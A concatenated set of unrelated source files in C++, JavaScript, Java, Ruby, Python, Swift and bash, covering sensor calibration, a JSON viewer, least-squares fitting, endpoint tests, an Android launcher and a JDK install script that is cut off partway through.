// Gyroscope bias estimate produced by calibration: one offset per axis.
struct BMX160GyroscopeCalibrationBiases
{
    float bx;
    float by;
    float bz;

    // Zero-initialize the biases. The previous default constructor left
    // them indeterminate, so printing or using a default-constructed
    // instance read uninitialized memory.
    BMX160GyroscopeCalibrationBiases() : bx(0), by(0), bz(0) {}

    BMX160GyroscopeCalibrationBiases(float x, float y, float z)
        : bx(x), by(y), bz(z)
    {
    }

    // CSV column names matching print().
    static std::string header() { return "bias_x,bias_y,bias_z\n"; }

    // Writes one CSV line: bx,by,bz.
    void print(std::ostream& os) const
    {
        os << bx << "," << by << "," << bz << "\n";
    }
};
|
<reponame>arthurcnorman/general
// Registers async terminal I/O hooks with the Emscripten library. Requires
// Asyncify; read_char_promise, outputBuf, term, out and intArrayToString are
// provided by the embedding page (not visible in this file).
mergeInto(LibraryManager.library, {
    // Suspends the wasm caller until one character of input is available,
    // then returns it.
    web_async_read: function () {
        return Asyncify.handleAsync(async () => {
            // out("waiting for input");
            const char = await read_char_promise();
            // out(char);
            return char;
        });
    },
    // Buffers output characters and flushes the buffer to the terminal
    // whenever a newline arrives. Always reports success (0).
    web_async_write: function (char) {
        // console.log('async write called: ')
        // out(intArrayToString([char]));
        outputBuf.push(char);
        if (intArrayToString([char]) === '\n') {
            term.write(outputBuf);
            outputBuf = [];
        }
        return 0;
    },
    // Debug variant: logs each character immediately instead of buffering.
    web_async_info_write: function (char) {
        out(`read char: ${char}, ${intArrayToString([char])}`);
        return 0;
    }
});
|
/* eslint-disable */
/* eslint-disable */
// AngularJS directive that renders an arbitrary JSON value as a collapsible
// d3-built tree. Arrays are rendered as clickable "Load N records" nodes that
// invoke the bound onSelect callback. Relies on globals d3, is (is.js), and $
// (jQuery/Bootstrap tooltip).
(function() {
    'use strict';
    angular.module('raws')
        .directive('jsonViewer', jsonViewer);
    jsonViewer.$inject = ['dataService'];
    function jsonViewer(dataService) {
        return {
            scope: {
                json: "=",       // JSON value to display (two-way bound)
                onSelect: "="    // callback invoked with an array when clicked
            },
            link: function postLink(scope, element, attrs) {
                // Re-render the whole tree whenever the bound JSON changes.
                scope.$watch('json', function(json) {
                    update();
                })
                function update() {
                    // Clear any previous rendering before rebuilding.
                    d3.select(element[0]).selectAll("*").remove();
                    var tree = d3.select(element[0])
                        .append("div")
                        .classed("json-node", "true")
                    var j = scope.json;
                    explore(j, tree);
                    // Recursively render value m into container el.
                    function explore(m, el) {
                        // Opening brace for a non-empty object at the root.
                        if (el === tree && is.object(m) && is.not.array(m) && is.not.empty(m)) {
                            el.append("div")
                                // .classed("json-node","true")
                                .text(function(d) {
                                    return "{";
                                })
                        }
                        // A non-empty array at the root is wrapped so the loop
                        // below treats it as a single child entry.
                        var n = el === tree && is.array(m) && is.not.empty(m) ? [m] : m;
                        for (var c in n) {
                            var cel = el.append("div")
                                .datum(n[c]) //function(d){console.log(el === tree, n); return el === tree ? {tree:n} : n[c]})
                                .classed("json-node", "true")
                            // Non-empty arrays start collapsed (except at root)
                            // and get a +/- toggle icon.
                            if (is.array(n[c]) && is.not.empty(n[c])) {
                                cel.classed("json-closed", function(d) {
                                    return el === tree ? "false" : "true"
                                })
                                cel.classed("json-array", function(d) {
                                    return el === tree ? "false" : "true"
                                })
                                //data-toggle="tooltip"
                                //data-title="Clear all"
                                cel.append("i")
                                    .classed("json-icon fa fa-plus-square-o pull-left", "true")
                                    .on("click", function(d) {
                                        d3.event.stopPropagation();
                                        // Flip collapsed state and swap the icon.
                                        d3.select(this.parentNode).classed("json-closed", function() {
                                            return !d3.select(this).classed("json-closed");
                                        })
                                        d3.select(this).classed("fa-plus-square-o", d3.select(this.parentNode).classed("json-closed"))
                                        d3.select(this).classed("fa-minus-square-o", !d3.select(this.parentNode).classed("json-closed"))
                                    })
                            }
                            // Key/value line: "<key> : value", or an opening
                            // bracket/brace for nested containers.
                            cel.append("div")
                                .html(function(d) {
                                    var pre = is.array(n) ? "" : "<b>" + c + "</b> : ";
                                    var text = is.array(n[c]) ? "[" : is.object(n[c]) ? "{" : n[c];
                                    text += is.array(n[c]) && !n[c].length ? "]" : is.object(n[c]) && is.empty(n[c]) ? "}" : "";
                                    return pre + text;
                                })
                            if (is.object(n[c])) explore(n[c], cel);
                        }
                        // Arrays below the root become clickable record loaders.
                        if (is.array(n) && el !== tree) {
                            el.select('div')
                                .attr("data-toggle", "tooltip")
                                .attr("data-title", function(d) {
                                    return "Load " + d.length + " records";
                                })
                                .on("mouseover", function(d) {
                                    d3.event.stopPropagation();
                                    d3.select(this.parentNode).classed("json-hover", true)
                                })
                                .on("mouseout", function(d) {
                                    d3.event.stopPropagation();
                                    d3.select(this.parentNode).classed("json-hover", false)
                                })
                                .on("click", function(d) {
                                    d3.event.stopPropagation();
                                    scope.onSelect(d);
                                })
                        }
                        // Closing bracket/brace for non-empty containers.
                        if (is.object(n) && is.not.empty(n)) {
                            if (is.array(n) && el === tree) return;
                            el.append("div")
                                // .classed("json-node","true")
                                .text(function(d) {
                                    var text = is.array(n) ? "]" : "}";
                                    return text;
                                })
                        }
                        // Activate Bootstrap tooltips on the elements added above.
                        $('[data-toggle="tooltip"]').tooltip({
                            animation: false
                        });
                    }
                }
            }
        };
    }
}());
|
<gh_stars>0
package br.univali.model.minimos_quadrados;
import br.univali.model.gauss.Sistema;
import java.util.*;
/**
 * Least-squares curve fitting over a list of sample points.
 *
 * Supports three models selected by {@code tipoAproximacao}:
 * "Polinomial" (y = a0 + a1*x + ... + an*x^n), "Geométrica" (y = a*x^b,
 * linearised as ln y = ln a + b*ln x) and "ae^bx" (y = a*e^(b*x), linearised
 * as ln y = ln a + b*x). The normal equations are solved by Gaussian
 * elimination ({@link Sistema}).
 */
public class MinimosQuadrados {
    private List<Point> points;
    private int grau;                 // degree of the fit
    private Double[] as;              // fitted coefficients
    private Double[] vectorY;         // target vector (log-transformed for non-linear models)
    List<Double[]> vectors;           // basis vectors u_i evaluated at every sample x
    private Double[][] matrizInicial;    // augmented matrix before elimination
    private Double[][] matrizEscalonada; // augmented matrix after elimination

    public Double[][] getMatrizInicial() {
        return matrizInicial;
    }

    public Double[][] getMatrizEscalonada() {
        return matrizEscalonada;
    }

    /**
     * Fits the chosen model immediately on construction.
     *
     * @param points sample points to fit
     * @param grau degree of the fit
     * @param tipoAproximacao "Polinomial", "Geométrica" or "ae^bx"
     */
    public MinimosQuadrados(List<Point> points, int grau, String tipoAproximacao) {
        this.points = points;
        this.grau = grau;
        this.vectors = new ArrayList<>();
        if (tipoAproximacao.equals("Polinomial")) {
            calcularPolinomial();
        } else if (tipoAproximacao.equals("Geométrica")) {
            calcularGeometrica();
        } else if (tipoAproximacao.equals("ae^bx")) {
            calcular_aebx();
        }
    }

    // Polynomial fit: basis u_i(x) = x^i, target y (no transformation).
    private void calcularPolinomial() {
        for (int i = 0; i < this.grau + 1; i++) {
            Double[] ui = new Double[points.size()];
            for (int j = 0; j < points.size(); j++) {
                ui[j] = Math.pow(points.get(j).getX(), i);
            }
            vectors.add(ui);
        }
        this.vectorY = new Double[points.size()];
        for (int i = 0; i < points.size(); i++) {
            vectorY[i] = points.get(i).getY();
        }
        calcular();
    }

    // Geometric fit y = a*x^b: basis {1, ln x}, target ln y.
    private void calcularGeometrica() {
        Double[] u0 = new Double[points.size()];
        for (int j = 0; j < points.size(); j++) {
            u0[j] = 1.0;
        }
        vectors.add(u0);
        for (int i = 1; i < this.grau + 1; i++) {
            Double[] ui = new Double[points.size()];
            for (int j = 0; j < points.size(); j++) {
                ui[j] = Math.log(points.get(j).getX());
            }
            vectors.add(ui);
        }
        this.vectorY = new Double[points.size()];
        for (int i = 0; i < points.size(); i++) {
            vectorY[i] = Math.log(points.get(i).getY());
        }
        calcular();
        // The solved intercept is ln(a); map it back to a.
        this.as[0] = Math.exp(this.as[0]);
    }

    // Exponential fit y = a*e^(b*x): basis {1, x}, target ln y.
    private void calcular_aebx() {
        Double[] u0 = new Double[points.size()];
        for (int j = 0; j < points.size(); j++) {
            u0[j] = 1.0;
        }
        vectors.add(u0);
        for (int i = 1; i < this.grau + 1; i++) {
            Double[] ui = new Double[points.size()];
            for (int j = 0; j < points.size(); j++) {
                ui[j] = points.get(j).getX();
            }
            vectors.add(ui);
        }
        this.vectorY = new Double[points.size()];
        for (int i = 0; i < points.size(); i++) {
            vectorY[i] = Math.log(points.get(i).getY());
        }
        calcular();
        // BUG FIX: the solved intercept is ln(a), so recovering a requires
        // exp() — exactly as in calcularGeometrica(). The original applied
        // Math.log() a second time, corrupting the a coefficient.
        this.as[0] = Math.exp(this.as[0]);
    }

    // Build the normal equations — the Gram matrix <u_i, u_j> augmented with
    // the column <u_i, y> — and solve them by Gaussian elimination.
    private void calcular() {
        Double[][] ampliedMatrix = new Double[this.grau + 1][this.grau + 2];
        for (int i = 0; i < this.grau + 1; i++) {
            for (int j = 0; j < this.grau + 1; j++) {
                ampliedMatrix[i][j] = dotProduct(vectors.get(i), vectors.get(j));
            }
        }
        for (int i = 0; i < this.grau + 1; i++) {
            ampliedMatrix[i][this.grau + 1] = dotProduct(vectors.get(i), vectorY);
        }
        // Keep a copy of the matrix before elimination for display purposes.
        this.matrizInicial = new Double[ampliedMatrix.length][ampliedMatrix[0].length];
        for (int i = 0; i < ampliedMatrix.length; i++) {
            for (int j = 0; j < ampliedMatrix[0].length; j++) {
                this.matrizInicial[i][j] = ampliedMatrix[i][j];
            }
        }
        Sistema sistema = new Sistema(ampliedMatrix);
        this.as = sistema.getVetorSolucao();
        this.matrizEscalonada = sistema.getMatriz();
    }

    // Dot product of two equally-sized vectors (named addVectors in the
    // original, which was a misnomer).
    private Double dotProduct(Double[] vectA, Double[] vectB) {
        Double sum = 0.0;
        for (int i = 0; i < vectA.length; i++) {
            sum += vectA[i] * vectB[i];
        }
        return sum;
    }

    /** @return the fitted coefficients (a0..an). */
    public Double[] getList() {
        return as;
    }
}
|
<filename>lib/permutations.rb
# Returns true when string2 is a permutation (anagram) of string1,
# counting repeated characters; false otherwise.
def permutations?(string1, string2)
  counts = Hash.new(0)
  string1.each_char { |letter| counts[letter] += 1 }

  string2.each_char do |letter|
    # A character string1 cannot supply (missing or exhausted) rules it out.
    return false if counts[letter].zero?
    counts[letter] -= 1
  end

  # Every count must be back to zero, otherwise string1 had leftovers.
  counts.values.all?(&:zero?)
end
|
<filename>test/controllers/consul/consul.get.controller.spec.js
const { describe, it } = require('eslint/lib/testers/event-generator-tester');
const { before, after } = require('mocha');
const expect = require('expect.js');
const sinon = require('sinon');
const request = require('supertest-as-promised');
const httpStatus = require('http-status');
const ConsulService = require('../../../app/services/consul.service');
const PermissionModel = require('../../../app/models/permission.model');
const PROJECTS = require('../../fixtures/projects.json');
const app = require('../../../server').app;
const loginHelpers = require('../../helpers/login');
const USER = require('../../fixtures/user.json');
// Integration tests for the Consul KV "get values" endpoint. The project
// permission lookup is stubbed for the whole suite; ConsulService.get is
// stubbed per test so no real Consul instance is needed.
describe('ConsulController', () => {
  let token = null;
  // Create a fixture user and obtain a JWT once for the whole suite.
  before((done) => {
    sinon.stub(PermissionModel, 'getUserProjects').resolves(PROJECTS);
    loginHelpers.createUser(USER)
      .then(user => loginHelpers.getJWT(user.username))
      .then(jwt => {
        token = jwt;
        done();
      });
  });
  // Undo the stub and remove the fixture user.
  after((done) => {
    PermissionModel.getUserProjects.restore();
    loginHelpers.deleteUser(USER.username)
      .then(() => {
        token = null;
        done();
      });
  });
  describe('get()', () => {
    const VALUES = require('../../fixtures/consul/consul-values.json');
    // No token header at all -> 401.
    it('should return unauthorized status', (done) => {
      const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
      request(app)
        .get('/consul/kv/values/CLOUD/console-server')
        .expect(httpStatus.UNAUTHORIZED)
        .then(() => {
          stub.restore();
          done();
        })
        .catch((err) => {
          stub.restore();
          done(err);
        });
    });
    // Valid token but a key outside the user's projects -> 401.
    // NOTE(review): the stub rejects here, yet UNAUTHORIZED is expected —
    // presumably the permission check fires before the service call; confirm.
    it('should return 401 status', (done) => {
      const stub = sinon.stub(ConsulService, 'get').rejects('error');
      request(app)
        .get('/consul/kv/values/key')
        .set('token', token)
        .expect(httpStatus.UNAUTHORIZED)
        .then(() => {
          stub.restore();
          done();
        })
        .catch((err) => {
          stub.restore();
          done(err);
        });
    });
    // Dotfile ("secret") keys must be rejected.
    it('should return error if secret key', (done) => {
      const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
      request(app)
        .get('/consul/kv/values/CLOUD/console-server/.secret-key')
        .set('token', token)
        .expect(httpStatus.INTERNAL_SERVER_ERROR)
        .then(() => {
          stub.restore();
          done();
        })
        .catch((err) => {
          stub.restore();
          done(err);
        });
    });
    // Directory-style keys (trailing slash) must be rejected.
    it('should return error if ending with slash', (done) => {
      const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
      request(app)
        .get('/consul/kv/values/CLOUD/console-server/')
        .set('token', token)
        .expect(httpStatus.INTERNAL_SERVER_ERROR)
        .then(() => {
          stub.restore();
          done();
        })
        .catch((err) => {
          stub.restore();
          done(err);
        });
    });
    // Happy path: service called with the full key, values echoed back.
    it('should return values', (done) => {
      const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
      request(app)
        .get('/consul/kv/values/CLOUD/console-server/config.json')
        .set('token', token)
        .expect(httpStatus.OK)
        .then((res) => {
          expect(stub.getCall(0).args).to.eql(['CLOUD/console-server/config.json']);
          expect(res.body.result).to.equal(true);
          expect(res.body.data).to.eql(VALUES);
          stub.restore();
          done();
        })
        .catch((err) => {
          stub.restore();
          done(err);
        });
    });
  });
});
|
import React, { Component, Fragment } from 'react';
import ReactDOM from 'react-dom';
import Header from './layout/Header';
import DashBoard from './businesses/Dashboard';
class App extends Component {
render() {
return (
<div className="container">
<Header />
<div className="container">
<DashBoard />
</div>
</div>
)
}
}
ReactDOM.render(<App />, document.getElementById('app'));
|
import numpy as np
def filterData(input_data, threshold=500):
    """Filter out values that deviate too far from the median.

    A median-based filter is robust to outliers, unlike a mean/std
    z-score filter (the original computed the standard deviation but
    never used it).

    Parameters
    ----------
    input_data : sequence of numbers
        Values to filter.
    threshold : float, optional
        Maximum allowed absolute deviation from the median; values with
        ``|val - median| >= threshold`` are dropped. Defaults to 500,
        the constant hard-coded in the original implementation.

    Returns
    -------
    list
        The surviving values, in their original order.
    """
    # Guard the empty case: np.median([]) would warn and return NaN.
    if len(input_data) == 0:
        return []
    med = np.median(input_data)
    return [val for val in input_data if abs(val - med) < threshold]
|
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package models;
import java.util.List;
import java.io.File;
import java.io.FileNotFoundException;
import java.util.Scanner;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.AbstractListModel;
/**
*
* @author pretizy
*/
// Swing list model that supplies "Chapter N" labels for the chapter list of a
// Bible reader UI. The labels are rebuilt from the chapter count stored in
// BookModel.old whenever setChapter() is called.
public class ChapterModel extends AbstractListModel {
    //create instance variables
    private static final long serialVersionUID = 1L;
    private BookModel book;      // currently selected book
    private int chapter;         // currently selected chapter number
    private Scanner scan;        // scanner over the selected book's text file
    private int c_count;         // chapter count (consumed while building labels)
    private List<String> list;   // NOTE(review): never used — confirm it can be removed
    //fake sample data
    private String[] strings;    // "Chapter 1".."Chapter N" labels shown in the JList
    //constructor with String parameter
    // NOTE(review): the constructor always opens the FIRST Old Testament book
    // (BookModel.old[0]) regardless of the book/chapter arguments — presumably
    // an initial-state shortcut; confirm this is intended.
    public ChapterModel(BookModel book, int chapter) {
        try {
            //write code to use book value to initialize the begining state of the chapter UI //
            this.chapter= chapter;
            this.book = book;
            this.scan=new Scanner(new File("Old Testament\\"+BookModel.old[0][0]+".txt"));
            c_count = Integer.parseInt(BookModel.old[0][1]);
            // Build labels back-to-front; c_count is decremented as we go, so
            // it also serves as the label number for each slot.
            String[] chap = new String[c_count];
            for (int y = c_count - 1; y >= 0; y--) {
                chap[y] = "Chapter " + c_count;
                c_count--;
            }
            //assign new array to strings
            strings = chap;
        } catch (FileNotFoundException ex) {
            Logger.getLogger(ChapterModel.class.getName()).log(Level.SEVERE, null, ex);
        }
    }
    public BookModel getBook() {
        return book;
    }
    public int getChapter() {
        return chapter;
    }
    // Re-point the model at a different book/chapter, rebuild the labels and
    // notify the attached JList.
    public void setChapter(int chapter, BookModel book) {
        try {
            this.chapter = chapter;
            this.book = book;
            //check to see the current testament
            // NOTE(review): only the "old" testament is handled here; other
            // testaments leave scan/c_count unchanged — confirm intended.
            if (getBook().getTestament().equals("old")) {
                scan = new Scanner(new File("Old Testament\\" + BookModel.old[getBook().getIndex()][0] + ".txt"));
                c_count = Integer.parseInt(BookModel.old[getBook().getIndex()][1]);
            }
        } catch (FileNotFoundException ex) {
            Logger.getLogger(ChapterModel.class.getName()).log(Level.SEVERE, null, ex);
        }
        //generate test data to test the app
        String[] chap = new String[c_count];
        for (int y = c_count - 1; y >= 0; y--) {
            chap[y] = "Chapter " + c_count;
            c_count--;
        }
        //assign new array to strings
        strings = chap;
        //change the UI whenever a different book is selected
        this.fireContentsChanged(this, 0, strings.length);
    }
    public Scanner getScan() {
        return scan;
    }
    //return size of the list
    public int getSize() {
        return strings.length;
    }
    public Object getElementAt(int index) {
        //write code to implement which chapter to be returned here.
        return strings[index];
    }
}
|
# # testing scenario 1 without multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out
#
# # testing scenario 2 with multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out -multiprocess
#
# # testing scenario 3 null without multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out -perturb data/perturb_score.txt.gz -null
#
# # testing scenario 4 null with multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out -perturb data/perturb_score.txt.gz -null -multiprocess
# testing tfwrapper
# Run the EPEE comparison (CD4 Naive vs Th2 conditions over the CD4+ T-cell
# network) through the tfwrapper params runner: 2 runs, 100 iterations,
# outputs prefixed "test_tfwrapper".
../script/analysis/tfwrapper_paramsrunner.sh python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_tfwrapper
|
/// Returns the sum of the even values in `numbers`.
func sumOfEvenNumbers(_ numbers: [Int]) -> Int {
    return numbers.filter { $0 % 2 == 0 }.reduce(0, +)
}

// Test the function
let numbers = [1, 2, 3, 4, 5, 6]
let result = sumOfEvenNumbers(numbers)
print(result) // Output: 12
|
<gh_stars>1-10
/*
* Copyright (C) 2018 iFLYTEK CO.,LTD.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.iflytek.cyber.inspector;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.preference.PreferenceManager;
import android.support.annotation.NonNull;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v7.app.AppCompatActivity;
import com.iflytek.cyber.inspector.setup.WelcomeFragment;
import com.iflytek.cyber.platform.AuthManager;
import com.iflytek.cyber.platform.DefaultTokenStorage;
import com.iflytek.cyber.platform.TokenManager;
import static android.Manifest.permission.RECORD_AUDIO;
import static android.content.pm.PackageManager.PERMISSION_GRANTED;
/**
 * Entry activity: wires up auth/token management, requests the microphone
 * permission, and routes the user to either the main UI (token present) or
 * the first-run welcome/setup flow.
 */
public class LauncherActivity extends AppCompatActivity {
    private AuthManager authManager;
    private TokenManager tokenManager;
    private SharedPreferences pref;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        pref = PreferenceManager.getDefaultSharedPreferences(this);
        updateClientId();
        // BUG FIX: the original called initMainFragment() unconditionally here
        // and then a second time inside the granted branch, committing the
        // initial fragment transaction twice on startup.
        if (checkSelfPermission(RECORD_AUDIO) == PERMISSION_GRANTED) {
            initMainFragment();
        } else {
            requestPermission();
        }
    }

    /** Ask for the microphone permission required by the voice features. */
    private void requestPermission() {
        requestPermissions(new String[]{RECORD_AUDIO}, 1);
    }

    @Override
    public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions,
                                           @NonNull int[] grantResults) {
        // Keep re-asking until the permission is granted; the app cannot
        // proceed without microphone access.
        if (grantResults[0] == PERMISSION_GRANTED) {
            initMainFragment();
        } else {
            requestPermission();
        }
        super.onRequestPermissionsResult(requestCode, permissions, grantResults);
    }

    @Override
    protected void onDestroy() {
        super.onDestroy();
        // Release auth/token resources with the activity.
        if (authManager != null) {
            authManager.cancel();
        }
        if (tokenManager != null) {
            tokenManager.destroy();
        }
    }

    /** Rebuild the auth/token managers from the preferred client id. */
    public void updateClientId() {
        if (authManager != null) {
            authManager.cancel();
        }
        if (tokenManager != null) {
            tokenManager.destroy();
        }
        authManager = new AuthManager(pref.getString("client_id", null));
        tokenManager = new TokenManager(new DefaultTokenStorage(this), authManager);
    }

    /** Show the main UI when a token exists, otherwise the setup flow. */
    public void initMainFragment() {
        if (tokenManager.hasToken()) {
            redirectTo(new MainFragment());
        } else {
            redirectTo(new WelcomeFragment());
        }
    }

    /** Replace the current fragment, clearing the whole back stack first. */
    public void redirectTo(Fragment fragment) {
        getSupportFragmentManager().popBackStackImmediate(
                null, FragmentManager.POP_BACK_STACK_INCLUSIVE);
        getSupportFragmentManager().beginTransaction()
                .replace(R.id.container, fragment)
                .commit();
    }

    /** Push a fragment onto the back stack (back returns to the previous one). */
    public void navigateTo(Fragment fragment) {
        getSupportFragmentManager().beginTransaction()
                .replace(R.id.container, fragment)
                .addToBackStack(null)
                .commit();
    }

    @Override
    public void onBackPressed() {
        // NOTE(review): super.onBackPressed() already pops the back stack;
        // the explicit popBackStack() here may skip an extra entry — confirm
        // this double pop is intended before changing it.
        super.onBackPressed();
        getSupportFragmentManager().popBackStack();
    }

    /** Start the OAuth authorize flow. */
    public void requestAuthorize(AuthManager.AuthorizeCallback callback) {
        authManager.authorize(callback);
    }

    public void cancelAuthorize() {
        authManager.cancel();
    }

    /**
     * Persist the tokens obtained at the end of the setup flow.
     * NOTE(review): operateToken is currently unused — confirm.
     */
    public void finishSetup(String accessToken, String refreshToken, long expiresAt,
                            String operateToken) {
        tokenManager.updateToken(accessToken, refreshToken, expiresAt);
    }

    /** Debug helper: drop tokens and return to the setup flow. */
    void debug_clearToken() {
        tokenManager.clearToken();
        initMainFragment();
    }

    void changeEndpoint() {
        navigateTo(new EndpointFragment());
    }
}
|
<filename>src/job/BillLinkFetchJob.js
const Actions = require('@action')
const AbstractJob = require('./Job').AbstractJob
const FetchAction = Actions.FetchAction
const FormatAction = Actions.BillLinkFetchAdapterAction
const TextParserAction = Actions.TextParserAction
const SelectionAction = Actions.SelectionAction
const ErrorHandler = Actions.HandleConnectionErrorAction
// Job that fetches a legislature page, extracts every anchor href, narrows the
// links down to PDF bill documents under /Content/Bills/, and formats the
// result. Connection errors retry via ErrorHandler, which re-invokes create().
class BillLinkFetchJob extends AbstractJob {
  // eslint-disable-next-line no-useless-constructor
  constructor (params, callback) {
    super(params, callback)
    // NOTE(review): params may already be stored by AbstractJob's constructor
    // (the eslint-disable above suggests so) — confirm this assignment is needed.
    this.params = params
  }
  // Factory: builds the job with its full action pipeline attached.
  static create (params, callback) {
    return new BillLinkFetchJob(params, callback)
      .addAction(new FetchAction(AbstractJob.createRequestParams(params)))
      // Collect the href attribute of every <a> element on the page.
      .addAction(new TextParserAction(false, 'a', (elem, $) => {
        return $(elem).attr('href')
      }))
      // Keep only bill-document links, then only PDFs.
      .addAction(new SelectionAction('/Content/Bills/'))
      .addAction(new SelectionAction('PDF'))
      .addAction(new FormatAction(params))
      .addErrorAction(new ErrorHandler(callback, BillLinkFetchJob.create, params))
  }
}
module.exports.BillLinkFetchJob = BillLinkFetchJob
|
#include <iostream>
using namespace std;
// Reverse arr[start..end] (inclusive bounds) in place by swapping
// symmetric pairs from the outside in.
void reverse(int arr[], int start, int end)
{
    for (int lo = start, hi = end; lo < hi; ++lo, --hi)
    {
        const int tmp = arr[lo];
        arr[lo] = arr[hi];
        arr[hi] = tmp;
    }
}
// Exercise reverse() on a small array and print the reversed contents,
// space separated (trailing space kept to match the original output).
int main()
{
    int values[] = {1, 2, 3, 4};
    const int count = sizeof(values) / sizeof(values[0]);

    reverse(values, 0, count - 1);

    for (int i = 0; i < count; ++i)
    {
        cout << values[i] << " ";
    }
    return 0;
}
|
from lsshipper.common.config import prepare_config
import asyncio
import signal
from functools import partial
import logging
import logging.config
from .common.state import State
from lsshipper.uploaders import Uploader, OneTimeUploader
# Prefer the faster uvloop event loop when it is installed; fall back to the
# default asyncio loop otherwise.
try:
    import uvloop
    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
    pass
# Number of termination signals received so far (first is graceful,
# second is forceful).
signal_times = 0
logger = logging.getLogger('general')
def got_int_signal(state, signum, frame):
    """Handle SIGINT/SIGTERM.

    First signal: request a graceful shutdown via the shared State.
    Second signal: force-close the event loop to kill the main loop.
    ``signum``/``frame`` are required by the signal API but unused.
    """
    global signal_times
    signal_times += 1
    logger.info("got term signal")
    state.shutdown()
    if signal_times > 1:
        logger.info("got term signal second time. Going to kill main loop")
        state.loop.close()
def main():
    """Entry point: build the uploader from config and run it to completion.

    Chooses a one-shot uploader when ``general.run-once`` is set, otherwise a
    continuously-running one. SIGINT/SIGTERM are routed to got_int_signal for
    graceful (then forceful) shutdown.
    """
    config = prepare_config()
    loop = asyncio.get_event_loop()
    state = State(loop)
    if config['general']['run-once']:
        uploader = OneTimeUploader(loop=loop, state=state, config=config)
    else:
        uploader = Uploader(loop=loop, state=state, config=config)
    task = asyncio.ensure_future(uploader.start())
    # partial() binds the shared state; signal supplies (signum, frame).
    signal.signal(signal.SIGINT, partial(got_int_signal, state))
    signal.signal(signal.SIGTERM, partial(got_int_signal, state))
    try:
        loop.run_until_complete(task)
    except KeyboardInterrupt as e:
        logger.info("process stopped by keyboard interrupt")
|
#!/bin/bash
# Download an Oracle JDK tarball/installer, unpack it under
# $TARGET_ROOT/usr/java, export JAVA_HOME/PATH via /etc/profile.d, and
# register the binaries with the distro's alternatives system.
# $1 = distribution name (Ubuntu, Fedora, RedHatEnterpriseServer, CentOS).
set -e
JAVA_TARGET_LOCATION="/usr/java"
export JAVA_DOWNLOAD_URL=${JAVA_DOWNLOAD_URL:-"http://download.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-x64.tar.gz"}
JAVA_HOME=$TARGET_ROOT$JAVA_TARGET_LOCATION
mkdir -p $JAVA_HOME
JAVA_FILE=$(basename $JAVA_DOWNLOAD_URL)
# The cookie header accepts Oracle's license so the download is not redirected.
wget --no-check-certificate --no-cookies -c \
    --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" \
    -O $JAVA_HOME/$JAVA_FILE $JAVA_DOWNLOAD_URL
# NOTE(review): with `set -e` above, a failed wget aborts the script before
# this check, so the else branch is unreachable — confirm before relying on it.
if [ $? -eq 0 ]; then
    echo "Java download successful"
else
    echo "Error downloading $JAVA_DOWNLOAD_URL, exiting"
    exit 1
fi
cd $JAVA_HOME
if [[ $JAVA_FILE == *.tar.gz ]]; then
    echo -e "\n" | tar -zxf $JAVA_FILE
    # The extracted directory is the only non-tarball entry in the target dir.
    JAVA_NAME=`ls -1 $JAVA_TARGET_LOCATION | grep -v tar.gz`
    chown -R root:root $JAVA_HOME
    cat >> /etc/profile.d/java.sh <<EOF
# Custom Java install
export JAVA_HOME=$JAVA_TARGET_LOCATION/$JAVA_NAME
export PATH=\$PATH:$JAVA_TARGET_LOCATION/$JAVA_NAME/bin
EOF
    # Register the JDK binaries with the distro's alternatives mechanism.
    case "$1" in
        Ubuntu )
            update-alternatives --install "/usr/bin/java" "java" "$JAVA_TARGET_LOCATION/$JAVA_NAME/bin/java" 1
            update-alternatives --install "/usr/bin/javac" "javac" "$JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javac" 1
            update-alternatives --install "/usr/bin/javaws" "javaws" "$JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javaws" 1
            update-alternatives --set java $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/java
            update-alternatives --set javac $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javac
            update-alternatives --set javaws $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javaws
        ;;
        Fedora | RedHatEnterpriseServer | CentOS )
            alternatives --install /usr/bin/java java $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/java 200000
